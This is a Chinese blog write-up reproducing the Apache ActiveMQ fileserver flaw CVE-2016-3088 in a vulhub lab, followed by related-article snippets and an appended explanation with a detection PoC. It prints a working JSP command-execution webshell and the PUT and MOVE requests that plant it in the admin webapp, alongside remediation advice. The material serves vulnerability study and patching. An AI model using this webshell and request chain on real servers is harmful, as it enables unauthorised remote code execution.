Apache ActiveMQ Fileserver远程代码执行漏洞复现(CVE-2016-3088)

最新推荐文章于 2024-11-24 10:00:00 发布
原创 最新推荐文章于 2024-11-24 10:00:00 发布 · 834 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web渗透 #漏洞复现 #activemq

本文详细解析了Apache ActiveMQ中的Fileserver漏洞,包括漏洞原理、影响版本及利用方式。同时提供了修复建议,如升级版本或禁用特定功能。

0X00简介

Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

0X01漏洞概述

ActiveMQ的web控制台分三个应用,分别是admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现,其使用率并不高且文件操作容易出现漏洞。

0X02影响版本

Apache ActiveMQ 5.x ~ 5.14.0

0X03漏洞利用

1.上传测试文件1.txt,证明可上传成功
在这里插入图片描述

2.获取物理路径

PUT /fileserver/%20/%20 HTTP/1.1

(本实验环境采用vulhub搭建,故直接访问http://ip:8161/admin/test/systemProperties.jsp获取物理路径)

在这里插入图片描述
3.PUT 一个 Jsp 的 Webshell 到 fileserver 目录

PUT /fileserver/1.jsp HTTP/1.1 

<%@ page import="java.io.*"%>
<%
    out.print("Hello</br>");
    String strcmd = request.getParameter("cmd");
    String line =null;
    Process p=Runtime.getRuntime().exec(strcmd);
     InputStream is = p.getInputStream();
      BufferedReader br = new BufferedReader(new InputStreamReader(is));
    while((line =br.readLine())!=null){
        out.print(line+"<br>");
    }
%>

在这里插入图片描述
4.利用 MOVE 方法将 Webshell 移入 admin/ 目录

MOVE /fileserver/1.jsp HTTP/1.1
Destination: file:///opt/activemq/webapps/admin/123.jsp

在这里插入图片描述
5.成功执行webshell权限
在这里插入图片描述

0X04漏洞修复

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能
在这里插入图片描述

Alluresec
关注
Active MQ 任意文件写入漏洞/远程代码执行漏洞CVE-2016-3088
初岄的博客
09-13 1468
Active MQ 任意文件写入漏洞/远程代码执行漏洞CVE-2016-3088
漏洞复现ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 831
Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
漏洞预警】Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)
weixin_30629977的博客
10-29 367
漏洞编码:CVE-2016-3088 实验环境:Linux Apache ActiveMQ版本号:Apache ActiveMQ 5.7.0 --------------------------------------------------------------------- 首先下载安装包 wget http://archive.apache.org/dist/activemq...
Http File Server(HFS2.3)
01-12
支持断点续传的http文件服务器,轻松架设http文件服务器。非常适合于断点续传的调试和http文件服务器的架设。
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088)
maverickpig的博客
07-01 887
Apache ActiveMQ Fileserver远程代码执行漏洞(CVE-2016-3088) 本文来源于vulhub漏洞库,为本人复现笔记,如有侵权可联系我删除* 该漏洞工作中遇到过几次,记个笔记先 漏洞详情 ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现及排查
dayouzi的博客
08-14 2814
ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
activemq 远程代码执行CVE-2016-3088
Cherish what you have!
11-24 244
ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问。用户名密码:admin:admin 路径:file////opt/apache-activemq-5.11.1/webapps。
漏洞复现(1)ActiveMQ任意文件上传漏洞——(CVE-2016-3088
Zeu_s的博客
10-20 1797
本次漏洞产生主要原因是Fileserver支持写入文件,不解析jsp,但是支持移动文件(Move),因此我们将jsp的文件PUT到Fileserver下,再通过Move指令移动到可执行的目录下访问。在漏洞爆发后使用fileserver的用户便减少了,导致截止最新版本已经删除了该功能。本篇文章还会制作更多漏洞复现后续,欢迎大家讨论,或者大家想看哪个漏洞复现,可以在评论区进行讨论。
Apache ActiveMQ Fileserver远程代码执行漏洞
08-25 197
  扫端口的时候遇到8161端口,输入admin/admin,成功登陆,之前就看到过相关文章,PUT了一句话上去,但是没有什么效果,于是本地搭建了一个环境,记录一下测试过程。 环境搭建: ActiveMQ 5.1.0 下载地址:http://activemq.apache.org/activemq-510-release.html 解压后,双击运行abtivemq.bat运行。(进...
Apache ActiveMQ 远程代码执行漏洞(QVD-2023-30790)
2301_81907423的博客
01-02 550
: echo;
三、【漏洞复现ActiveMQ Fileserver远程代码执行漏洞
weixin_52351575的博客
09-20 892
ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。此漏洞出现在Fileserver应用程序中,该漏洞的原理实际上非常简单,即文件服务器支持写入文件(但不解析JSP),同时支持移动文件(MOVE请求)。1、编写Webshel​​l(方便,但文件服务器不需要解析jsp,admin和api都需要登录才能访问)
ActiveMQ 反序列化漏洞CVE-2015-5254)漏洞复现vulhub
qq_53003652的博客
07-06 265
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ FileServer漏洞(详细)
weixin_30498921的博客
06-23 675
半个月前,巡检时发现服务器出现不明进程,对其进行了处理,由于当时没有做详细记录,在这里把大致过程描述一下. 症状: ps命令发现出现几个不明进程,   1.于/tmp下运行的,名称随机的进程.占用CPU高达100%,确认为挖矿机   2.于activemq下运行的不明进程,占用CPU很低,kill -9 杀死进程后会自动重启(当时以为是activemq的正常进程,后核对后发现该进程不属于a...
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
m0_74402888的博客
05-02 2558
漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞。写入文件方法写入 webshell写入 cron 或 ssh key 等文件写入 jar 或 jetty.xml 等库和配置文件。
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3305
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
ActiveMQ(CVE-2016-3088)复现学习笔记
hklearner的博客
03-28 760
ActiveMQ复现学习笔记 (CVE-2016-3088) 漏洞描述 影响版本:Apache ActiveMQ 5.x~5.14.0 漏洞产生原因:ActiveMQweb控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持
任意文件上传mysql_ActiveMq PUT任意文件上传漏洞CVE-2016-3088漏洞复现
weixin_32515349的博客
02-22 501
漏洞原理该漏洞出现在fileserver应用中,ActiveMQ中的fileserver服务允许用户通过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),但是支持移动文件(Move)我们可以将jsp的文件PUT到Fileserver下,然后再通过Move指令移动到可执行目录下访问环境搭建使用vulhub一键搭建,靶机kali:192.168.1771.37d...
【全功能专用】Http File Server (HFS) 专用HFS模板 分享!
热门推荐
准女婿的博客
08-07 1万+
在原版基础上进行优化,界面清爽优雅,格式整齐。 可自由切换显示/隐藏左边功能区。 1、新增“留言板”功能,支持QQ表情功能; 2、新增服务器通讯状态; 3、新增显示“注释”列,优化注释(鼠标焦点自动显示注释),避免影响界面美观; 4、优化最新标志、上传功能、优化一些操作习惯和界面格式;
AvtiveMQ任意文件上传漏洞(CVE-2016-3088)漏洞复现
最新发布
03-19
### CVE-2016-3088 漏洞概述 CVE-2016-3088Apache ActiveMQ 的一个任意文件写入漏洞,主要由于 `fileserver` 应用未受保护且允许通过 HTTP 请求创建和移动文件。此漏洞影响的版本范围为 Apache ActiveMQ 5.x 至 5.14.0 版本[^3]。 --- ### 环境准备 为了复现漏洞,需搭建受影响的环境: #### 使用 VulnHub 靶场 VulnHub 提供了一个方便的漏洞测试平台,可以快速部署目标服务。按照以下步骤操作: 1. 下载并启动 Docker 或虚拟机镜像。 2. 安装指定版本的 Apache ActiveMQ(如 5.13.0),确保其配置启用了 `fileserver` 功能。 3. 修改 `conf/jetty.xml` 文件中的 `<bean>` 节点,启用 `fileserver` Web 应用程序。 ```bash docker run --name activemq -p 8161:8161 webcenter/activemq:5.13.0 ``` 上述命令会运行一个容器化的 ActiveMQ 实例,并将其管理端口映射到主机上的 8161 端口。 --- ### 漏洞验证方法 #### 利用工具或手动发送请求 可以通过向 `/fileserver/{filename}` 发送 `PUT` 请求来验证是否存在漏洞。以下是具体过程: 1. **构造恶意请求** 向服务器发送一个带有自定义数据体的 `PUT` 请求,尝试在 `fileserver` 中创建新文件。 ```http PUT /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Content-Type: text/plain Content-Length: 17 This is a test file. ``` 2. **确认文件已成功上传** 访问路径 `/fileserver/test.txt` 并查看返回的内容是否匹配预期的数据。 3. **执行 MOVE 方法** 将刚刚创建的文件移动至其他目录下,例如 Tomcat 的根目录或其他可加载的位置。 ```http MOVE /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Destination: http://localhost:8161/tomcat/webapps/root/shell.jsp Overwrite: T ``` 如果一切正常,则会在目标位置生成新的 JSP 文件,从而实现远程代码执行的效果。 --- ### 自动化检测脚本 (POC) XRay 工具提供了针对 CVE-2016-3088 的自动化扫描功能,下面是一个简单的 YAML 格式的 POC 描述文件[^4]: ```yaml name: poc-yaml-activemq_CVE-2016-3088 set: r1: randomInt(5, 10) r2: randomLowercase(r1) rules: - method: PUT path: /fileserver/{{r2}} expression: | response.status == 204 detail: author: laura_lion links: - https://github.com/Laura0xiaoshizi ``` 将以上内容保存为 `.yaml` 文件后导入 XRay 执行即可完成批量探测工作。 --- ### 注意事项 尽管漏洞利用相对简单,但在实际环境中应严格遵循法律规范,仅限于授权范围内进行渗透测试活动。此外,在生产环境下务必及时更新软件补丁以防止此类安全风险的发生。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值